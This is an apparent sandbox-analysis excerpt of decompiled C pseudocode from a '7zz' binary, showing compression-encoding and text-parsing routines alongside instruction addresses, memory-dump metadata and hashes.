					E00448580(_t627,  *(_t636 + 0x4c), 0xf);
					_t345 = _t420;
					_t421 = 0;
					 *(_t636 + 0x1c) = _t345;
					 *(_t636 + 0x10) = 0;
					 *((intOrPtr*)(_t636 + 0x24)) = _t627 + ((_t588 << 7) + _t588) * 2 - 0xee;
					do {
						_t475 = 0;
						_t346 = _t345 / _t588;
						_t605 = _t421;
						if(_t346 > 0) {
							_t572 = _t636 + 0x270 + _t421 * 4;
							do {
								_t631 =  *_t572;
								_t572 = _t572 + 4;
								_t475 = _t475 + _t631;
								_t605 = _t605 + 1;
							} while (_t475 < _t346);
						}
						_t173 = _t605 - 1; // 0x0
						_t628 = _t173;
						if(_t628 > _t421 && _t588 !=  *(_t636 + 0x18) && _t588 != 1 && ( *(_t636 + 0x10) & 0x00000001) == 1) {
							_t605 = _t628;
							_t475 = _t475 -  *((intOrPtr*)(_t636 + 0x270 + _t605 * 4));
						}
						_t629 =  *((intOrPtr*)(_t636 + 0x24));
						_t347 = 0;
						do {
							if(_t347 < _t421 || _t347 >= _t605) {
								_t536 = 1;
							} else {
								_t536 = 0;
							}
							 *((char*)(_t347 + _t629)) = _t536;
							_t347 = _t347 + 1;
						} while (_t347 <  *(_t636 + 0x38));
						_t421 = _t605;
						_t345 =  *(_t636 + 0x1c) - _t475;
						_t588 = _t588 - 1;
						 *(_t636 + 0x1c) = _t345;
						 *(_t636 + 0x10) =  *(_t636 + 0x10) + 1;
						 *((intOrPtr*)(_t636 + 0x24)) = _t629 - 0x102;
					} while (_t588 != 0);
					_t632 =  *((intOrPtr*)(_t636 + 0x54));
					 *(_t636 + 0x28) = 4;
					do {
						_t422 =  *(_t636 + 0x18);
						_t538 = 0;
						_t608 = _t632 + 0x620;
						do {
							_t589 = _t608;
							_t538 = _t538 + 1;
							_t608 = _t608 + 0x408;
							memset(_t589, 0, 0x102 << 2);
							_t636 = _t636 + 0xc;
						} while (_t538 < _t422);
						_t478 = 0;
						 *((intOrPtr*)(_t636 + 0x34)) = 0;
						 *(_t636 + 0x1c) = _t632 + 0x3680;
						do {
							_t539 =  *((intOrPtr*)(_t636 + 0x3c));
							_t591 = 0;
							_t609 = _t636 + 0x70;
							do {
								_t353 =  *((intOrPtr*)(_t478 + _t539));
								_t478 = _t478 + 1;
								if(0 >= 0xff) {
									_t353 = 0;
									_t478 = _t478 + 1;
								}
								 *_t609 = _t353;
								_t591 = _t591 + 1;
								_t609 = _t609 + 4;
							} while (_t591 < 0x32 && _t478 <  *((intOrPtr*)(_t636 + 0x20)));
							 *((intOrPtr*)(_t636 + 0x30)) = _t478;
							 *((intOrPtr*)(_t636 + 0x24)) = 0xffffffff;
							 *(_t636 + 0x10) = 0;
							_t633 = _t632 + 0x14;
							do {
								_t610 = 0;
								_t354 = 0;
								_t479 = _t636 + 0x70;
								do {
									_t479 = _t479 + 4;
									_t610 = _t610;
									_t354 = _t354 + 1;
								} while (_t354 < _t591);
								if(_t610 <  *((intOrPtr*)(_t636 + 0x24))) {
									 *((intOrPtr*)(_t636 + 0x24)) = _t610;
									 *( *(_t636 + 0x1c)) =  *(_t636 + 0x10);
								}
								_t356 =  *(_t636 + 0x10) + 1;
								_t633 = _t633 + 0x102;
								 *(_t636 + 0x10) = _t356;
							} while (_t356 <  *(_t636 + 0x18));
							_t632 =  *((intOrPtr*)(_t636 + 0x54));
							_t611 = _t632 + 0x5d6e388;
							 *((intOrPtr*)(_t636 + 0x34)) =  *((intOrPtr*)(_t636 + 0x34)) + 1;
							 *(_t636 + 0x1c) =  *(_t636 + 0x1c) + 1;
							_t483 = 0;
							_t544 = _t636 + 0x70;
							do {
								_t361 =  *_t544;
								_t544 =  &(_t544[1]);
								_t483 = _t483 + 1;
								 *((intOrPtr*)(_t611 + _t361 * 4)) =  *((intOrPtr*)(_t611 + _t361 * 4)) + 1;
							} while (_t483 < _t591);
							_t478 =  *((intOrPtr*)(_t636 + 0x30));
						} while (_t478 <  *((intOrPtr*)(_t636 + 0x20)));
						_t592 = 0;
						_t429 = _t632 + 0x14;
						_t612 = _t632 + 0x620;
						do {
							_t484 = 0;
							_t364 = _t612;
							do {
								if( *_t364 == 0) {
									 *_t364 = 1;
								}
								_t484 = _t484 + 1;
								_t364 = _t364 + 4;
							} while (_t484 <  *(_t636 + 0x38));
							_push(0x10);
							_push(0x102);
							_push(_t429);
							E00459960(_t612, _t612 + 0x1830);
							_t592 = _t592 + 1;
							_t429 = _t429 + 0x102;
							_t612 = _t612 + 0x408;
						} while (_t592 <  *(_t636 + 0x18));
						_t368 =  *(_t636 + 0x28) - 1;
						 *(_t636 + 0x28) = _t368;
					} while (_t368 != 0);
					_t369 = 0;
					do {
						 *((char*)(_t636 + _t369 + 0x40)) = _t369;
						_t369 = _t369 + 1;
					} while (_t369 <  *(_t636 + 0x18));
					_t370 =  *((intOrPtr*)(_t636 + 0x40));
					_t593 = 0;
					do {
						_t430 =  *((intOrPtr*)(_t593 + _t632 + 0x3680));
						_t613 = 0;
						if(_t370 != _t430) {
							do {
								E00448610(1);
								_t399 =  *((intOrPtr*)(_t636 + _t613 + 0x41));
								_t613 = _t613 + 1;
							} while (_t399 != _t430);
						}
						E00448610(0);
						while(_t613 > 0) {
							 *((char*)(_t636 + _t613 + 0x40)) =  *((intOrPtr*)(_t636 + _t613 + 0x3f));
							_t613 = _t613 - 1;
						}
						_t593 = _t593 + 1;
						_t370 = _t430;
						 *((char*)(_t636 + 0x40)) = _t370;
					} while (_t593 <  *(_t636 + 0x4c));
					 *(_t636 + 0x28) = 0;
					 *(_t636 + 0x10) = _t632 + 0x14;
					do {
						_t614 = 0;
						E00448580(_t632, 0, 5);
						_t431 = 0;
						do {
							while(_t614 != 0) {
								E00448610(1);
								if(_t614 >= 0) {
									E00448610(1);
									_t614 = _t614 - 1;
								} else {
									E00448610(0);
									_t614 = _t614 + 1;
								}
							}
							E00448610(0);
							_t431 = _t431 + 1;
						} while (_t431 <  *(_t636 + 0x38));
						_t379 =  *(_t636 + 0x28) + 1;
						 *(_t636 + 0x28) = _t379;
						 *(_t636 + 0x10) =  *(_t636 + 0x10) + 0x102;
					} while (_t379 <  *(_t636 + 0x18));
					 *((intOrPtr*)(_t636 + 0x30)) = 0;
					 *((intOrPtr*)(_t636 + 0x34)) = 0;
					 *((intOrPtr*)(_t636 + 0x24)) = 0;
					 *(_t636 + 0x10) = 0;
					 *(_t636 + 0x28) = _t632 + 0x3680;
					do {
						_t382 =  *(_t636 + 0x10);
						_t498 =  *((intOrPtr*)(_t382 +  *((intOrPtr*)(_t636 + 0x3c))));
						_t383 = _t382 + 1;
						 *(_t636 + 0x10) = _t383;
						if(0 >= 0xff) {
							_t498 = 0;
							 *(_t636 + 0x10) = _t383 + 1;
						}
						_t552 =  *((intOrPtr*)(_t636 + 0x30));
						if(_t552 == 0) {
							_t552 = 0x32;
							 *(_t636 + 0x28) =  *(_t636 + 0x28) + 1;
							 *((intOrPtr*)(_t636 + 0x34)) = _t632 + 0x175b76e;
							 *((intOrPtr*)(_t636 + 0x24)) = _t632 + 0x5d6fbb8;
						}
						 *((intOrPtr*)(_t636 + 0x30)) = _t552 - 1;
						_t385 =  *(_t632 + 0x10);
						_t616 = 0;
						_t595 =  *( *((intOrPtr*)(_t636 + 0x24)) + _t498 * 4);
						if(0 > 0) {
							do {
								_t500 = _t385[1];
								if(_t616 < _t500) {
									_t500 = _t616;
								}
								_t616 = _t616 - _t500;
								 *(_t636 + 0x1c) = _t500;
								_t385[2] = _t385[2] << _t500;
								_t565 = _t595 >> _t616;
								_t433 = _t565 | _t385[2];
								_t385[2] = _t433;
								_t595 = _t595 - (_t565 << _t616);
								_t568 = _t385[1] -  *(_t636 + 0x1c);
								_t385[1] = _t568;
								if(_t568 == 0) {
									 *(_t385[3] +  *_t385) = _t433;
									_t385[1] = 8;
									 *_t385 =  *_t385 + 1;
								}
							} while (_t616 > 0);
						}
					} while ( *(_t636 + 0x10) <  *((intOrPtr*)(_t636 + 0x20)));
					_t387 =  *((intOrPtr*)(_t632 + 0x8cdc));
					if(_t387 != 0) {
						_t470 =  *(_t632 + 0x10);
						_t604 =  *(_t636 + 0x58);
						_t596 =  *(_t636 + 0x2c);
						_t387 = 8 +  *_t470 * 8 - _t470[1] - _t604;
						if(_t387 >  *((intOrPtr*)(_t636 + 0x50))) {
							L126:
							_t587 = _t596 + 1;
							 *(_t636 + 0x2c) = _t587;
							if(_t587 <= 7) {
								_t420 =  *(_t636 + 0x5c);
								continue;
							}
						} else {
							if(_t596 != 6) {
								 *((intOrPtr*)(_t636 + 0x50)) = _t387;
								 *(_t636 + 0x48) = _t596;
								goto L126;
							}
						}
					}
					return _t387;
					L44:
					if(_t420 >= 0xc8) {
						if(_t420 >= 0x258) {
							if(_t420 >= 0x4b0) {
								asm("sbb eax, eax");
								_t342 = _t341 + 6;
								goto L51;
							} else {
								 *(_t636 + 0x18) = 4;
							}
						} else {
							 *(_t636 + 0x18) = 3;
						}
					} else {
						 *(_t636 + 0x18) = 2;
					}
					goto L52;
				}
			}






























































































                                                                                                                                    0x0044873a
                                                                                                                                    0x0044873e
                                                                                                                                    0x00448742
                                                                                                                                    0x00448747
                                                                                                                                    0x00448758
                                                                                                                                    0x00448764
                                                                                                                                    0x00448769
                                                                                                                                    0x00448775
                                                                                                                                    0x00448782
                                                                                                                                    0x00448786
                                                                                                                                    0x00448788
                                                                                                                                    0x0044878c
                                                                                                                                    0x0044878c
                                                                                                                                    0x00448790
                                                                                                                                    0x00448796
                                                                                                                                    0x00448798
                                                                                                                                    0x004487a4
                                                                                                                                    0x004487a7
                                                                                                                                    0x004487a7
                                                                                                                                    0x00448798
                                                                                                                                    0x004487b0
                                                                                                                                    0x004487b2
                                                                                                                                    0x004487bb
                                                                                                                                    0x004487bf
                                                                                                                                    0x004487c6
                                                                                                                                    0x004487c7
                                                                                                                                    0x004487c7
                                                                                                                                    0x004487cb
                                                                                                                                    0x004487cc
                                                                                                                                    0x004487d3
                                                                                                                                    0x004487d5
                                                                                                                                    0x004487dc
                                                                                                                                    0x004487e1
                                                                                                                                    0x004487e2
                                                                                                                                    0x004487e7
                                                                                                                                    0x004487e9
                                                                                                                                    0x004487f4
                                                                                                                                    0x00448800
                                                                                                                                    0x00448800
                                                                                                                                    0x00448805
                                                                                                                                    0x00448806
                                                                                                                                    0x00448816
                                                                                                                                    0x00448826
                                                                                                                                    0x00448826
                                                                                                                                    0x00448832
                                                                                                                                    0x00448836
                                                                                                                                    0x00448838
                                                                                                                                    0x0044883b
                                                                                                                                    0x0044883f
                                                                                                                                    0x00448843
                                                                                                                                    0x0044884a
                                                                                                                                    0x0044884e
                                                                                                                                    0x0044885f
                                                                                                                                    0x00448862
                                                                                                                                    0x00448866
                                                                                                                                    0x0044886a
                                                                                                                                    0x0044886c
                                                                                                                                    0x0044886c
                                                                                                                                    0x00448870
                                                                                                                                    0x00448871
                                                                                                                                    0x0044886c
                                                                                                                                    0x00448875
                                                                                                                                    0x0044887a
                                                                                                                                    0x0044887e
                                                                                                                                    0x00448884
                                                                                                                                    0x00448885
                                                                                                                                    0x00448888
                                                                                                                                    0x00448890
                                                                                                                                    0x00448897
                                                                                                                                    0x0044889f
                                                                                                                                    0x004488a7
                                                                                                                                    0x004488af
                                                                                                                                    0x004488b7
                                                                                                                                    0x004488bf
                                                                                                                                    0x004488c3
                                                                                                                                    0x004488c6
                                                                                                                                    0x004488cb
                                                                                                                                    0x004488cf
                                                                                                                                    0x004488cf
                                                                                                                                    0x004488d5
                                                                                                                                    0x004488d7
                                                                                                                                    0x004488db
                                                                                                                                    0x004488df
                                                                                                                                    0x004488e0
                                                                                                                                    0x004488e4
                                                                                                                                    0x004488e4
                                                                                                                                    0x004488ea
                                                                                                                                    0x004488ee
                                                                                                                                    0x004488f5
                                                                                                                                    0x004488f7
                                                                                                                                    0x004488f7
                                                                                                                                    0x00448901
                                                                                                                                    0x00448904
                                                                                                                                    0x00448914
                                                                                                                                    0x00448916
                                                                                                                                    0x00448916
                                                                                                                                    0x004488f7
                                                                                                                                    0x00448920
                                                                                                                                    0x00448934
                                                                                                                                    0x00448922
                                                                                                                                    0x00448922
                                                                                                                                    0x00448928
                                                                                                                                    0x0044892b
                                                                                                                                    0x0044892b
                                                                                                                                    0x00448945
                                                                                                                                    0x00448947
                                                                                                                                    0x004488f0
                                                                                                                                    0x004488f0
                                                                                                                                    0x004488f0
                                                                                                                                    0x00448958
                                                                                                                                    0x0044895e
                                                                                                                                    0x00448962
                                                                                                                                    0x00448962
                                                                                                                                    0x0044896e
                                                                                                                                    0x00448970
                                                                                                                                    0x00448970
                                                                                                                                    0x0044897a
                                                                                                                                    0x0044897d
                                                                                                                                    0x0044898d
                                                                                                                                    0x0044898f
                                                                                                                                    0x0044898f
                                                                                                                                    0x00448970
                                                                                                                                    0x00448993
                                                                                                                                    0x0044899c
                                                                                                                                    0x004489a7
                                                                                                                                    0x004489ab
                                                                                                                                    0x004489ac
                                                                                                                                    0x0044899e
                                                                                                                                    0x004489a2
                                                                                                                                    0x004489a2
                                                                                                                                    0x004489bf
                                                                                                                                    0x004489c1
                                                                                                                                    0x004489c5
                                                                                                                                    0x004489c7
                                                                                                                                    0x004489ce
                                                                                                                                    0x004489d3
                                                                                                                                    0x004489d3
                                                                                                                                    0x004489d5
                                                                                                                                    0x004489d8
                                                                                                                                    0x004489da
                                                                                                                                    0x004489da
                                                                                                                                    0x004489dd
                                                                                                                                    0x004489e0
                                                                                                                                    0x004489e5
                                                                                                                                    0x004489e9
                                                                                                                                    0x004489f2
                                                                                                                                    0x004489fa
                                                                                                                                    0x00448a0a
                                                                                                                                    0x00448a0f
                                                                                                                                    0x00448a13
                                                                                                                                    0x00448a1b
                                                                                                                                    0x00448a1f
                                                                                                                                    0x00448a29
                                                                                                                                    0x00448a29
                                                                                                                                    0x00448a31
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00448a3c
                                                                                                                                    0x00448a4b
                                                                                                                                    0x00448a4e
                                                                                                                                    0x00448a51
                                                                                                                                    0x00448a54
                                                                                                                                    0x00448a57
                                                                                                                                    0x00448a5f
                                                                                                                                    0x00448aa6
                                                                                                                                    0x00448aa6
                                                                                                                                    0x00448a59
                                                                                                                                    0x00448a59
                                                                                                                                    0x00448a59
                                                                                                                                    0x00448aaa
                                                                                                                                    0x00448aaa
                                                                                                                                    0x00448ab3
                                                                                                                                    0x00448ac1
                                                                                                                                    0x00448ac8
                                                                                                                                    0x00448acd
                                                                                                                                    0x00448ad1
                                                                                                                                    0x00448ad5
                                                                                                                                    0x00448ae0
                                                                                                                                    0x00448ae4
                                                                                                                                    0x00448ae6
                                                                                                                                    0x00448ae8
                                                                                                                                    0x00448aea
                                                                                                                                    0x00448aee
                                                                                                                                    0x00448af0
                                                                                                                                    0x00448af7
                                                                                                                                    0x00448af7
                                                                                                                                    0x00448af9
                                                                                                                                    0x00448afc
                                                                                                                                    0x00448afe
                                                                                                                                    0x00448aff
                                                                                                                                    0x00448af7
                                                                                                                                    0x00448b03
                                                                                                                                    0x00448b03
                                                                                                                                    0x00448b08
                                                                                                                                    0x00448b21
                                                                                                                                    0x00448b23
                                                                                                                                    0x00448b23
                                                                                                                                    0x00448b2a
                                                                                                                                    0x00448b2e
                                                                                                                                    0x00448b30
                                                                                                                                    0x00448b32
                                                                                                                                    0x00448b3c
                                                                                                                                    0x00448b38
                                                                                                                                    0x00448b38
                                                                                                                                    0x00448b38
                                                                                                                                    0x00448b41
                                                                                                                                    0x00448b48
                                                                                                                                    0x00448b49
                                                                                                                                    0x00448b51
                                                                                                                                    0x00448b57
                                                                                                                                    0x00448b59
                                                                                                                                    0x00448b61
                                                                                                                                    0x00448b67
                                                                                                                                    0x00448b6b
                                                                                                                                    0x00448b6b
                                                                                                                                    0x00448b75
                                                                                                                                    0x00448b79
                                                                                                                                    0x00448b81
                                                                                                                                    0x00448b81
                                                                                                                                    0x00448b85
                                                                                                                                    0x00448b87
                                                                                                                                    0x00448b8d
                                                                                                                                    0x00448b8f
                                                                                                                                    0x00448b91
                                                                                                                                    0x00448b97
                                                                                                                                    0x00448b9f
                                                                                                                                    0x00448b9f
                                                                                                                                    0x00448b9f
                                                                                                                                    0x00448ba3
                                                                                                                                    0x00448bab
                                                                                                                                    0x00448baf
                                                                                                                                    0x00448bb3
                                                                                                                                    0x00448bb3
                                                                                                                                    0x00448bb7
                                                                                                                                    0x00448bb9
                                                                                                                                    0x00448bbd
                                                                                                                                    0x00448bbf
                                                                                                                                    0x00448bc2
                                                                                                                                    0x00448bc8
                                                                                                                                    0x00448bcf
                                                                                                                                    0x00448bd1
                                                                                                                                    0x00448bd1
                                                                                                                                    0x00448bd2
                                                                                                                                    0x00448bd4
                                                                                                                                    0x00448bd5
                                                                                                                                    0x00448bd8
                                                                                                                                    0x00448be3
                                                                                                                                    0x00448be7
                                                                                                                                    0x00448bef
                                                                                                                                    0x00448bf7
                                                                                                                                    0x00448bfa
                                                                                                                                    0x00448bfa
                                                                                                                                    0x00448bfc
                                                                                                                                    0x00448bfe
                                                                                                                                    0x00448c02
                                                                                                                                    0x00448c06
                                                                                                                                    0x00448c0c
                                                                                                                                    0x00448c0e
                                                                                                                                    0x00448c0f
                                                                                                                                    0x00448c17
                                                                                                                                    0x00448c21
                                                                                                                                    0x00448c25
                                                                                                                                    0x00448c25
                                                                                                                                    0x00448c2f
                                                                                                                                    0x00448c30
                                                                                                                                    0x00448c38
                                                                                                                                    0x00448c38
                                                                                                                                    0x00448c3e
                                                                                                                                    0x00448c5c
                                                                                                                                    0x00448c63
                                                                                                                                    0x00448c67
                                                                                                                                    0x00448c6b
                                                                                                                                    0x00448c6d
                                                                                                                                    0x00448c71
                                                                                                                                    0x00448c71
                                                                                                                                    0x00448c73
                                                                                                                                    0x00448c7d
                                                                                                                                    0x00448c80
                                                                                                                                    0x00448c80
                                                                                                                                    0x00448c84
                                                                                                                                    0x00448c8c
                                                                                                                                    0x00448c94
                                                                                                                                    0x00448c96
                                                                                                                                    0x00448c99
                                                                                                                                    0x00448c9f
                                                                                                                                    0x00448c9f
                                                                                                                                    0x00448ca1
                                                                                                                                    0x00448ca3
                                                                                                                                    0x00448ca6
                                                                                                                                    0x00448ca8
                                                                                                                                    0x00448ca8
                                                                                                                                    0x00448cb2
                                                                                                                                    0x00448cb3
                                                                                                                                    0x00448cb6
                                                                                                                                    0x00448cba
                                                                                                                                    0x00448cbc
                                                                                                                                    0x00448cc1
                                                                                                                                    0x00448cca
                                                                                                                                    0x00448cd3
                                                                                                                                    0x00448cd4
                                                                                                                                    0x00448cda
                                                                                                                                    0x00448ce0
                                                                                                                                    0x00448ce8
                                                                                                                                    0x00448ce9
                                                                                                                                    0x00448ce9
                                                                                                                                    0x00448cf3
                                                                                                                                    0x00448cf5
                                                                                                                                    0x00448cf9
                                                                                                                                    0x00448cfd
                                                                                                                                    0x00448cfe
                                                                                                                                    0x00448d02
                                                                                                                                    0x00448d06
                                                                                                                                    0x00448d08
                                                                                                                                    0x00448d08
                                                                                                                                    0x00448d0f
                                                                                                                                    0x00448d13
                                                                                                                                    0x00448d15
                                                                                                                                    0x00448d19
                                                                                                                                    0x00448d1e
                                                                                                                                    0x00448d22
                                                                                                                                    0x00448d23
                                                                                                                                    0x00448d15
                                                                                                                                    0x00448d2b
                                                                                                                                    0x00448d32
                                                                                                                                    0x00448d38
                                                                                                                                    0x00448d3c
                                                                                                                                    0x00448d3d
                                                                                                                                    0x00448d45
                                                                                                                                    0x00448d46
                                                                                                                                    0x00448d4a
                                                                                                                                    0x00448d4a
                                                                                                                                    0x00448d53
                                                                                                                                    0x00448d5b
                                                                                                                                    0x00448d5f
                                                                                                                                    0x00448d6b
                                                                                                                                    0x00448d6e
                                                                                                                                    0x00448d73
                                                                                                                                    0x00448d75
                                                                                                                                    0x00448d82
                                                                                                                                    0x00448d88
                                                                                                                                    0x00448d8f
                                                                                                                                    0x00448da1
                                                                                                                                    0x00448da6
                                                                                                                                    0x00448d91
                                                                                                                                    0x00448d95
                                                                                                                                    0x00448d9a
                                                                                                                                    0x00448d9a
                                                                                                                                    0x00448da7
                                                                                                                                    0x00448daf
                                                                                                                                    0x00448db8
                                                                                                                                    0x00448db9
                                                                                                                                    0x00448dc9
                                                                                                                                    0x00448dd2
                                                                                                                                    0x00448dd6
                                                                                                                                    0x00448dd6
                                                                                                                                    0x00448dde
                                                                                                                                    0x00448de2
                                                                                                                                    0x00448de6
                                                                                                                                    0x00448dea
                                                                                                                                    0x00448df4
                                                                                                                                    0x00448df8
                                                                                                                                    0x00448df8
                                                                                                                                    0x00448e02
                                                                                                                                    0x00448e05
                                                                                                                                    0x00448e0c
                                                                                                                                    0x00448e10
                                                                                                                                    0x00448e17
                                                                                                                                    0x00448e1a
                                                                                                                                    0x00448e1a
                                                                                                                                    0x00448e1e
                                                                                                                                    0x00448e24
                                                                                                                                    0x00448e2c
                                                                                                                                    0x00448e34
                                                                                                                                    0x00448e43
                                                                                                                                    0x00448e55
                                                                                                                                    0x00448e55
                                                                                                                                    0x00448e5e
                                                                                                                                    0x00448e67
                                                                                                                                    0x00448e6a
                                                                                                                                    0x00448e72
                                                                                                                                    0x00448e75
                                                                                                                                    0x00448e77
                                                                                                                                    0x00448e77
                                                                                                                                    0x00448e7c
                                                                                                                                    0x00448e7e
                                                                                                                                    0x00448e7e
                                                                                                                                    0x00448e83
                                                                                                                                    0x00448e87
                                                                                                                                    0x00448e8d
                                                                                                                                    0x00448e92
                                                                                                                                    0x00448e99
                                                                                                                                    0x00448ea3
                                                                                                                                    0x00448ea6
                                                                                                                                    0x00448eab
                                                                                                                                    0x00448ead
                                                                                                                                    0x00448eb0
                                                                                                                                    0x00448eb7
                                                                                                                                    0x00448ebd
                                                                                                                                    0x00448ec4
                                                                                                                                    0x00448ec4
                                                                                                                                    0x00448ec6
                                                                                                                                    0x00448e77
                                                                                                                                    0x00448ed2
                                                                                                                                    0x00448eda
                                                                                                                                    0x00448ee2
                                                                                                                                    0x00448ee4
                                                                                                                                    0x00448ee7
                                                                                                                                    0x00448eef
                                                                                                                                    0x00448f01
                                                                                                                                    0x00448f05
                                                                                                                                    0x00448f14
                                                                                                                                    0x00448f14
                                                                                                                                    0x00448f18
                                                                                                                                    0x00448f1c
                                                                                                                                    0x00448a25
                                                                                                                                    0x00000000
                                                                                                                                    0x00448a25
                                                                                                                                    0x00448f07
                                                                                                                                    0x00448f0a
                                                                                                                                    0x00448f0c
                                                                                                                                    0x00448f10
                                                                                                                                    0x00000000
                                                                                                                                    0x00448f10
                                                                                                                                    0x00448f0a
                                                                                                                                    0x00448f05
                                                                                                                                    0x00448f2c
                                                                                                                                    0x00448a65
                                                                                                                                    0x00448a6b
                                                                                                                                    0x00448a7d
                                                                                                                                    0x00448a8f
                                                                                                                                    0x00448aa1
                                                                                                                                    0x00448aa3
                                                                                                                                    0x00000000
                                                                                                                                    0x00448a91
                                                                                                                                    0x00448a91
                                                                                                                                    0x00448a91
                                                                                                                                    0x00448a7f
                                                                                                                                    0x00448a7f
                                                                                                                                    0x00448a7f
                                                                                                                                    0x00448a6d
                                                                                                                                    0x00448a6d
                                                                                                                                    0x00448a6d
                                                                                                                                    0x00000000
                                                                                                                                    0x00448a6b

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: YA1
                                                                                                                                    • API String ID: 0-613462611
                                                                                                                                    • Opcode ID: 40c36dd2d9e12414e66adf71fdb657f7f3508d8c1f6a41737e3c26815d29bb3b
                                                                                                                                    • Instruction ID: 099bcbc28d88e1846a75dfe823cd1f8e9a6e0cdfc63d5bc2b083594896ecf992
                                                                                                                                    • Opcode Fuzzy Hash: 40c36dd2d9e12414e66adf71fdb657f7f3508d8c1f6a41737e3c26815d29bb3b
                                                                                                                                    • Instruction Fuzzy Hash: DE42D2716083818FE715DF28C49066FBBE2BFD9308F14496EE8D59B342DA35D806CB86
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0042DBB6 Relevance: 1.7, APIs: 1, Instructions: 246COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                    			E0042DBB6(intOrPtr __ecx, signed int __edx) {
				signed int _t133;
				intOrPtr _t135;
				signed int _t136;
				signed int _t137;
				signed int _t148;
				intOrPtr _t159;
				signed int _t160;
				intOrPtr _t162;
				void* _t164;
				signed int _t167;
				intOrPtr _t175;
				signed int _t177;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t201;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				intOrPtr _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed int _t223;
				signed int _t225;
				void* _t226;

				_t211 = __edx;
				L0046B890(0x477530, _t226);
				_t175 = __ecx;
				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
				E0040862D();
				_t223 =  *(_t226 + 8);
				E0040867E( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
				while(1) {
					_t133 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
					_t183 = _t211;
					 *(_t226 - 0x1c) = _t133;
					 *(_t226 - 0x18) = _t183;
					if(_t133 != 0xd) {
						goto L6;
					}
					L2:
					_t211 = 0;
					if(_t183 != 0) {
						L7:
						__eflags = _t133 - 0xa;
						if(_t133 != 0xa) {
							L9:
							__eflags = _t133 - 9;
							if(_t133 != 9) {
								L11:
								__eflags = _t133 | _t183;
								if((_t133 | _t183) == 0) {
									L13:
									_t135 =  *((intOrPtr*)(_t226 + 0xc));
									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
										L17:
										_t184 =  *((intOrPtr*)(_t226 + 0xc));
										_t214 = 0;
										 *(_t226 - 0x10) = 0;
										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
											L27:
											__eflags =  *(_t226 - 0x1c) - 9;
											if( *(_t226 - 0x1c) == 9) {
												__eflags =  *(_t226 - 0x18) - _t211;
												if( *(_t226 - 0x18) == _t211) {
													_t160 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
													_t184 =  *((intOrPtr*)(_t226 + 0xc));
													 *(_t226 - 0x18) = _t211;
													 *(_t226 - 0x1c) = _t160;
													_t211 = 0;
													__eflags = 0;
												}
											}
											_t215 =  *(_t223 + 8);
											 *(_t226 - 0x10) = _t211;
											__eflags = _t215 - _t211;
											 *(_t226 + 8) = _t211;
											if(_t215 <= _t211) {
												L37:
												_t136 =  *(_t226 - 0x1c);
												__eflags = _t136 - 0xa;
												if(_t136 != 0xa) {
													L48:
													_t137 = _t136 |  *(_t226 - 0x18);
													__eflags = _t137;
													if(_t137 == 0) {
														_t185 =  *((intOrPtr*)(_t226 + 0x14));
														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
															L54:
															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
															return _t137;
														}
														E0042CFAA(_t185,  *(_t226 + 8));
														_t137 = E0040862D();
														_t225 =  *(_t226 + 8);
														__eflags = _t225;
														if(_t225 <= 0) {
															goto L54;
														} else {
															goto L53;
														}
														do {
															L53:
															_t137 = E00415C6D( *((intOrPtr*)(_t226 + 0x18)), 0);
															_t225 = _t225 - 1;
															__eflags = _t225;
														} while (_t225 != 0);
														goto L54;
													}
													E0042D192( *((intOrPtr*)(_t175 + 0x18)), _t211);
													L50:
													 *(_t226 - 0x1c) = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
													 *(_t226 - 0x18) = _t211;
													goto L36;
												}
												__eflags =  *(_t226 - 0x18) - _t211;
												if(__eflags != 0) {
													goto L48;
												}
												 *(_t226 - 0x48) = _t211;
												 *(_t226 - 0x44) = _t211;
												 *(_t226 - 0x40) = _t211;
												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
												 *((intOrPtr*)(_t226 - 0x4c)) = 0x47ab08;
												 *(_t226 - 4) = _t211;
												 *(_t226 - 0x34) = _t211;
												 *(_t226 - 0x30) = _t211;
												 *(_t226 - 0x2c) = _t211;
												 *((intOrPtr*)(_t226 - 0x28)) = 4;
